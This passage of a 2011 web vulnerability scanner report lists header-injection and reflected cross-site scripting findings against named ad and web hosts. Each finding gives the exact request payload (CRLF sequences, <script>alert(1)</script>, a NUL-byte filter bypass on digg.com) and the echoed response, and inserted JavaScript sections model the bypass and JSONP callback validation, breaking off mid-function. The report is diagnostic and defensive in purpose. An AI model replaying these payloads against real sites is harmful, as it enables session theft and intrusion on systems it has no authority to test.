<p>The document has moved <a href="http://altfarm.mediaplex.com/ad/js/86555
22598
...[SNIP]...

3.8. http://mp.apmebf.com/ad/js/16228-124632-26209-1 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mp.apmebf.com
Path:   /ad/js/16228-124632-26209-1

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 43e84%0d%0a25027eec15f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /43e84%0d%0a25027eec15f/js/16228-124632-26209-1?mpt=33312011918&mpvc=&host=altfarm.mediaplex.com HTTP/1.1
Host: mp.apmebf.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=g14vo-36788-1303134591742-0g

Response

HTTP/1.1 302 Found
Date: Mon, 18 Apr 2011 13:49:52 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: S=g14vo-36788-1303134591742-0g; domain=.apmebf.com; path=/; expires=Wed, 17-Apr-2013 13:49:52 GMT
Location: http://altfarm.mediaplex.com/43e84
25027eec15f
/js/16228-124632-26209-1?mpt=33312011918&mpvc=&no_cj_c=0&upsid=822523287793
Content-Length: 318
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://altfarm.mediaplex.com/43e84
25027eec15f
...[SNIP]...

3.9. http://mp.apmebf.com/ad/js/16228-124632-26209-1 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mp.apmebf.com
Path:   /ad/js/16228-124632-26209-1

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 7001a%0d%0af5c43e94391 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /ad/7001a%0d%0af5c43e94391/16228-124632-26209-1?mpt=33312011918&mpvc=&host=altfarm.mediaplex.com HTTP/1.1
Host: mp.apmebf.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=g14vo-36788-1303134591742-0g

Response

HTTP/1.1 302 Found
Date: Mon, 18 Apr 2011 13:49:52 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: S=g14vo-36788-1303134591742-0g; domain=.apmebf.com; path=/; expires=Wed, 17-Apr-2013 13:49:52 GMT
Location: http://altfarm.mediaplex.com/ad/7001a
f5c43e94391
/16228-124632-26209-1?mpt=33312011918&mpvc=&no_cj_c=0&upsid=822523287793
Content-Length: 318
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://altfarm.mediaplex.com/ad/7001a
f5c43e94
...[SNIP]...

3.10. http://mp.apmebf.com/ad/js/16228-124632-26209-1 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mp.apmebf.com
Path:   /ad/js/16228-124632-26209-1

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload eef45%0d%0a3926a01f3a7 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /ad/js/eef45%0d%0a3926a01f3a7?mpt=33312011918&mpvc=&host=altfarm.mediaplex.com HTTP/1.1
Host: mp.apmebf.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=g14vo-36788-1303134591742-0g

Response

HTTP/1.1 302 Found
Date: Mon, 18 Apr 2011 13:49:53 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: S=g14vo-36788-1303134591742-0g; domain=.apmebf.com; path=/; expires=Wed, 17-Apr-2013 13:49:53 GMT
Location: http://altfarm.mediaplex.com/ad/js/eef45
3926a01f3a7
?mpt=33312011918&mpvc=&no_cj_c=0&upsid=822523287793
Content-Length: 300
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://altfarm.mediaplex.com/ad/js/eef45
3926a
...[SNIP]...

3.11. http://mp.apmebf.com/ad/js/16228-124632-26209-1 [S cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mp.apmebf.com
Path:   /ad/js/16228-124632-26209-1

Issue detail

The value of the S cookie is copied into the Set-Cookie response header. The payload fd87f%0d%0ab3f991af6c was submitted in the S cookie. This caused a response containing an injected HTTP header.

Request

GET /ad/js/16228-124632-26209-1?mpt=33312011918&mpvc=&host=altfarm.mediaplex.com HTTP/1.1
Host: mp.apmebf.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=fd87f%0d%0ab3f991af6c

Response

HTTP/1.1 302 Found
Date: Mon, 18 Apr 2011 13:49:52 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: S=fd87f
b3f991af6c
; domain=.apmebf.com; path=/; expires=Wed, 17-Apr-2013 13:49:52 GMT
Location: http://altfarm.mediaplex.com/ad/js/16228-124632-26209-1?mpt=33312011918&mpvc=&no_cj_c=0&upsid=601200273551
Content-Length: 302
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://altfarm.mediaplex.com/ad/js/16228-124632
...[SNIP]...

3.12. http://nike.112.2o7.net/b/ss/nikeall/1/H.22.1/s25785419596359 [vmf parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nike.112.2o7.net
Path:   /b/ss/nikeall/1/H.22.1/s25785419596359

Issue detail

The value of the vmf request parameter is copied into the Location response header. The payload a1282%0d%0ab2fa319b9d3 was submitted in the vmf parameter. This caused a response containing an injected HTTP header.

Request

GET /b/ss/nikeall/1/H.22.1/s25785419596359?AQB=1&ndh=1&t=18%2F3%2F2011%2013%3A54%3A25%201%20300&vmt=4DCC71DA&vmf=a1282%0d%0ab2fa319b9d3&ce=UTF-8&ns=nike&pageName=GLGW%3Elang_selector%3Emain&g=http%3A%2F%2Fwww.nike.com%2Fnikeos%2Fp%2Fnike%2Flanguage_select%2F&cc=USD&vvp=DFA%231517119%3Av49%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=nike.com&server=nikeuslanding&v5=D%3DUser-Agent&c17=language_selector&c18=language_selector&c21=language_selector&c22=non-id&c24=D%3DUser-Agent&c26=D%3Dg&v48=D%3DpageName&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1333&bh=1003&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: nike.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.nike.com/nikeos/p/nike/language_select/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]

Response

HTTP/1.1 302 Found
Date: Mon, 18 Apr 2011 18:59:15 GMT
Server: Omniture DC/2.0.0
Location: http://a1282
b2fa319b9d3
/b/ss/nikeall/1/H.22.1/s25785419596359?AQB=1&vmh=nike.112.2o7.net&&ndh=1&t=18%2F3%2F2011%2013%3A54%3A25%201%20300&vmt=4DCC71DA&vmf=a1282%0d%0ab2fa319b9d3&ce=UTF-8&ns=nike&pageName=GLGW%3Elang_selector%3Emain&g=http%3A%2F%2Fwww.nike.com%2Fnikeos%2Fp%2Fnike%2Flanguage_select%2F&cc=USD&vvp=DFA%231517119%3Av49%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=nike.com&server=nikeuslanding&v5=D%3DUser-Agent&c17=language_selector&c18=language_selector&c21=language_selector&c22=non-id&c24=D%3DUser-Agent&c26=D%3Dg&v48=D%3DpageName&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1333&bh=1003&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
Expires: Sun, 17 Apr 2011 18:59:15 GMT
Last-Modified: Tue, 19 Apr 2011 18:59:15 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
xserver: www6
Content-Length: 0
Content-Type: text/plain


4. Cross-site scripting (reflected)
There are 203 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://ads.adxpose.com/ads/ads.js [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload b6657<script>alert(1)</script>1d078170340 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_321611b6657<script>alert(1)</script>1d078170340 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/martindale.lawyer.locator.dart/ll_cpm_skyscraper;sz=160x600;ord=6949645150452853000?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E70429D6F6493FB663F1D006E3F690ED; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Set-Cookie: evlu=ea003982-934b-4901-a1cd-965372735402; Domain=adxpose.com; Expires=Sat, 06-May-2079 04:17:55 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 18 Apr 2011 01:03:47 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
_LOG_EVENT__("000_000_3",b,j,"",Math.round(Y.left)+","+Math.round(Y.top),O+","+I,C,l,m,v,S,c)}}t=p.inView}}}if(!__ADXPOSE_PREFS__.override){__ADXPOSE_WIDGET_IN_VIEW__("container_ZC45X9Axu6NOUFfX_321611b6657<script>alert(1)</script>1d078170340".replace(/[^\w\d]/g,""),"ZC45X9Axu6NOUFfX_321611b6657<script>
...[SNIP]...

4.2. http://btilelog.access.mapquest.com/tilelog/transaction [transaction parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://btilelog.access.mapquest.com
Path:   /tilelog/transaction

Issue detail

The value of the transaction request parameter is echoed unencoded into the body of a 400 Bad Request response served as text/plain. The payload d3225<script>alert(1)</script>5267428e12c was submitted in the transaction parameter. This input was echoed unmodified in the application's response.

Browsers do not render a text/plain body as HTML, so this request does not demonstrate script execution; the residual risk is a client that sniffs the body and treats it as HTML. Sending X-Content-Type-Options: nosniff closes that path, and the error message should either not echo the unrecognised command at all or encode it.

Request

GET /tilelog/transaction?transaction=scriptd3225<script>alert(1)</script>5267428e12c&key=mjtd%7Clu6t2l68nh%2C7x%3Do5-larxu&itk=true&v=5.3.s&ipkg=controls1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: btilelog.access.mapquest.com

Response

HTTP/1.1 400 Bad Request
Date: Mon, 18 Apr 2011 15:44:56 GMT
Server: Apache
Content-Length: 79
Cache-Control: max-age=300
Expires: Mon, 18 Apr 2011 15:49:56 GMT
Connection: close
Content-Type: text/plain

Bad Request (unknown command) scriptd3225<script>alert(1)</script>5267428e12c

4.3. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /services/messagebroker/amf

Issue detail

The value of the 3rd AMF string parameter is echoed unencoded inside an AMF-serialised response (Content-Type: application/x-amf). The payload 5d490<script>alert(1)</script>6c07b23ce7c was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.

An AMF response is consumed by the Flash player's AMF deserialiser, not rendered by the browser, so execution is not demonstrated here. The reflection becomes exploitable only if a client deserialises the string and writes it into the page without encoding. Treat it as unencoded reflection to fix on the server rather than as a confirmed XSS.

Request

POST /services/messagebroker/amf?playerKey=AQ~~,AAAAD-JXpIE~,2UdjlQofkYVVekkI7wu0XeNF7ORIavpH HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
content-type: application/x-amf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 558

.......Fcom.brightcove.experience.ExperienceRuntimeFacade.getDataForExperience../1.....    ...Q40fa004b3547ab3a0ff840506fbf51f7cc0b5520
cccom.brightcove.experience.ViewerExperienceRequest.deliveryType.ex
...[SNIP]...

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 173.193.214.243
X-BC-Connecting-IP: 173.193.214.243
Content-Type: application/x-amf
Vary: Accept-Encoding
Date: Mon, 18 Apr 2011 14:35:19 GMT
Server:
Content-Length: 3745

......../1/onResult.......
.C[com.brightcove.templating.ViewerExperienceDTO#analyticsTrackers.publisherType.publisherId.playerKey.version#programmedContent!adTranslationSWF.id.hasProgramming+programmi
...[SNIP]...
/..I....eAQ~~,AAAAD-JXpIE~,2UdjlQofkYVVekkI7wu0XeNF7ORIavpH.    ..videoPlayer
sicom.brightcove.player.programming.ProgrammedMediaDTO.mediaId..playerId.componentRefId    type.mediaDTO
.Bb..Kb ....ivideoPlayer5d490<script>alert(1)</script>6c07b23ce7c.........
.cOcom.brightcove.catalog.trimmed.VideoDTO.dateFiltered+FLVFullLengthStreamed/SWFVerificationRequired.endDate.FLVFullCodec.linkText.geoRestricted.previewLength.FLVPreviewSize.longDescription.
...[SNIP]...

4.4. http://digg.com/submit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a58a7"><script>alert(1)</script>77bba122453 was submitted in the REST URL parameter 1. This input was echoed as a58a7"><script>alert(1)</script>77bba122453 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte: the filter stops reading at the %00, while the application runtime (PHP, per the X-Powered-By header) keeps the whole value, which is why the reflected href below still contains both the %00 and the tag that followed it. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
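
The parsing differential behind this bypass, modelled in a few lines as an added example that is not part of the report and not any vendor's product: a filter that sees a NUL-terminated string, an application that keeps the whole value, and a gate that checks the fully decoded value before either. The pattern list and the function names are simplified assumptions; the request line is the one from 4.4.

```javascript
// Added example, not from the report or any WAF vendor: a model of the NUL
// truncation that produces the bypass in 4.4, and a gate that closes it. The
// "native-style" filter and the DANGEROUS pattern list are simplified
// assumptions for illustration.

const DANGEROUS = /<script|<img|onerror\s*=|javascript:/i;

// A filter written in C sees a NUL-terminated string: the bytes after the
// first \0 do not exist for it.
function nativeStyleFilterBlocks(decodedValue) {
  const visibleToC = decodedValue.split('\0')[0];
  return DANGEROUS.test(visibleToC);
}

// The application runtime keeps the whole string and reflects it, so it
// emits exactly the part the filter never inspected.
function applicationReflects(decodedValue) {
  return '<link rel="alternate" type="application/rss+xml" title="Digg" href="/' +
    decodedValue + '.rss">';
}

// Percent-decoding is what turns %00 into a real NUL character. Decode once,
// here, and run every check on the result: decoding again later would open a
// second differential of the same kind.
function decodePathSegment(raw) {
  return decodeURIComponent(raw);
}

// Hardened gate, run on the fully decoded value before any blocklist: a NUL
// has no legitimate use in a path segment or query value, so reject it, then
// check the whole string rather than a prefix of it.
function gateAccepts(decodedValue) {
  if (decodedValue.includes('\0')) return false;
  return !DANGEROUS.test(decodedValue);
}

// Walks one raw path segment through both models and reports what each saw.
function trace(rawSegment) {
  const decoded = decodePathSegment(rawSegment);
  const reflected = applicationReflects(decoded);
  return {
    filterBlocked: nativeStyleFilterBlocks(decoded),
    scriptReachedResponse: reflected.includes('<script>'),
    gateAccepts: gateAccepts(decoded),
  };
}

// Constructed from the request line in 4.4.
const NUL_PAYLOAD = 'submit%00a58a7"><script>alert(1)</script>77bba122453';
```

`trace(NUL_PAYLOAD)` reports that the native-style filter did not block the request, that `<script>` reached the response, and that the gate rejects the value; the same payload without the `%00` is caught by the filter as well. The gate is a compensating control at the boundary, not a substitute for encoding the value where it is written into the page.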

Request

GET /submit%00a58a7"><script>alert(1)</script>77bba122453 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 01:51:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-781655937076166248%3A200; expires=Tue, 19-Apr-2011 01:51:14 GMT; path=/; domain=digg.com
Set-Cookie: d=075a1b6a89f9b59d7a37b2048cfaf45f82af5bfdf9358fea56c7ba2ef0d630b4; expires=Sat, 17-Apr-2021 11:58:54 GMT; path=/; domain=.digg.com
X-Digg-Time: D=467628 10.2.128.108
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16389

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%00a58a7"><script>alert(1)</script>77bba122453.rss">
...[SNIP]...

4.5. http://ds.addthis.com/red/psi/sites/vasco.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/vasco.com/p.json

Issue detail

The value of the callback request parameter is used, without validation, as the JSONP callback name at the start of a text/javascript response. The payload 12318<script>alert(1)</script>93554ce024a was submitted in the callback parameter. This input was echoed unmodified in the application's response.

An unrestricted callback name gives the requester control over the start of the script body. Opening the URL directly displays the body rather than rendering it, so exploitation relies on a client that sniffs the response as HTML or on a page that includes it; either way the fix is the same: accept only a dotted JavaScript identifier as the callback, answer anything else with an error that echoes nothing, and send X-Content-Type-Options: nosniff.

Request

GET /red/psi/sites/vasco.com/p.json?callback=_ate.ad.hpr12318<script>alert(1)</script>93554ce024a&uid=4dab4fa85facd099&url=http%3A%2F%2Fvasco.com%2Fcompany%2Fsitemap.aspx&ip8zpn HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uit=1; psc=4; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 453
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 18 Apr 2011 10:24:56 GMT; Path=/
Set-Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; Domain=.addthis.com; Expires=Sun, 17 Jul 2011 10:24:56 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 18 May 2011 10:24:56 GMT; Path=/
Set-Cookie: di=%7B%7D..1303122296.1FE|1303122296.60|1303122296.66; Domain=.addthis.com; Expires=Wed, 17-Apr-2013 10:24:55 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 18 Apr 2011 10:24:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 18 Apr 2011 10:24:56 GMT
Connection: close

_ate.ad.hpr12318<script>alert(1)</script>93554ce024a({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dab4fa85facd099","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2fvasco.com%2
...[SNIP]...

4.6. http://ds.addthis.com/red/psi/sites/www.curtis.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.curtis.com/p.json

Issue detail

The value of the callback request parameter is used, without validation, as the JSONP callback name at the start of a text/javascript response. The payload f7304<script>alert(1)</script>4ee0dbebf63 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

Same issue, same exploitation conditions and same remediation as 4.5; the endpoint differs only in the site path, so one fix to the callback handling covers both.

Request

GET /red/psi/sites/www.curtis.com/p.json?callback=_ate.ad.hprf7304<script>alert(1)</script>4ee0dbebf63&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.curtis.com%2Fsitecontent.cfm%3Fpageid%3D11&ref=http%3A%2F%2Fwww.curtis.com%2Fsitecontent.cfm%3Fpageid%3D11&9smkta HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uit=1; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1303122295.1FE|1303122295.60|1303122322.66; psc=4; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 18 Apr 2011 17:00:32 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 18 May 2011 17:00:32 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 18 Apr 2011 17:00:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 18 Apr 2011 17:00:32 GMT
Connection: close

_ate.ad.hprf7304<script>alert(1)</script>4ee0dbebf63({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})
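
A JSONP handler that validates the callback name before echoing it, beside the unchecked behaviour 4.5 and 4.6 exhibit, as an added example. This is not AddThis code; the function names, the response object shape and the header choices are assumptions for illustration, and the callback values in the usage note are taken from the report.

```javascript
// Added example, not AddThis code: JSONP callback validation beside the
// unchecked behaviour seen in 4.5 and 4.6. Function names and the response
// shape are assumptions for illustration.

// A callback must be a JavaScript identifier, optionally dotted (_ate.ad.hpr).
// Everything the report's payload adds (<, >, /, parentheses) fails this.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;
const CALLBACK_MAX = 128;

function isValidCallback(name) {
  return typeof name === 'string' && name.length <= CALLBACK_MAX && CALLBACK_RE.test(name);
}

// JSON that is also safe inside a script: U+2028/U+2029 are line terminators
// in JavaScript, and "</" must not be able to close a <script> element if the
// body is ever inlined into HTML.
function scriptSafeJson(value) {
  return JSON.stringify(value)
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029')
    .replace(/<\//g, '<\\/');
}

// As observed: the callback is concatenated straight into the body.
function jsonpUnchecked(callback, data) {
  return {
    status: 200,
    headers: { 'Content-Type': 'text/javascript' },
    body: callback + '(' + JSON.stringify(data) + ')',
  };
}

// Hardened: invalid names get a 400 that echoes nothing; valid ones get a
// script body with nosniff so no browser re-interprets it as HTML. The
// leading /**/ is the common guard against an alphanumeric callback name
// (which still passes the identifier check) turning the body into a file
// another plugin would accept as its own format.
function jsonpChecked(callback, data) {
  if (!isValidCallback(callback)) {
    return {
      status: 400,
      headers: { 'Content-Type': 'text/plain', 'X-Content-Type-Options': 'nosniff' },
      body: 'invalid callback',
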